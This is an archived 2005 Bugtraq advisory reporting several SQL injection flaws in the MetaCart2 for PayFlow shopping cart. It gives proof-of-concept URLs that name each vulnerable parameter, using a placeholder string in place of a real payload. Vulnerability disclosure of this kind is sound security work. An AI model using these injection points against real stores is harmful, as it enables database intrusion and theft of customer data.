lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 26 Apr 2005 21:38:50 -0000
From: dcrab <dcrab@...kerscenter.com>
To: bugtraq@...urityfocus.com
Subject: MetaCart2 for PayFlow Multiple Sql Injection Vulnerabilities




Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. 
Learn more at http://www.digitalparadox.org/services.ah

Severity: High
Title: MetaCart2 for PayFlow Multiple Sql Injection Vulnerabilities
Date: 27/04/2005

Vendor: MetaCart
Vendor Website: http://metalinks.com
Summary: There are, multiple sql injection vulnerabilities in metacart2 
for payflow.


Proof of Concept Exploits: 

http://example.com/mcart2pfp/productsByCategory.asp?intCatalogID='SQL_INJECTION&amp%3bstrCatalog_NAME=Computers
SQL INJECTION


http://example.com/mcart2pfp/productsByCategory.asp?strSubCatalogID='SQL_INJECTION&amp%3bcurCatalogID=10001&amp%3bstrSubCatalog_NAME=Laptops
SQL INJECTION


http://example.com/mcart2pfp/productsByCategory.asp?strSubCatalogID=1&amp%3bcurCatalogID='SQL_INJECTION&amp%3bstrSubCatalog_NAME=Laptops
SQL INJECTION


http://example.com/mcart2pfp/productsByCategory.asp?strSubCatalogID=1&amp%3bcurCatalogID=10001&amp%3bstrSubCatalog_NAME='SQL_INJECTION
SQL INJECTION


http://example.com/mcart2pfp/product.asp?intProdID='SQL_INJECTION
SQL INJECTION


http://example.com/mcart2pfp/productsByCategory.asp?intCatalogID='SQL_INJECTION&amp%3bpage=2
SQL INJECTION


Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilties have been found and released by Diabolic Crab, Email: 
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact 
me regarding these vulnerabilities. You can find me at, 
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my 
soon to come out book on Secure coding with php.



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ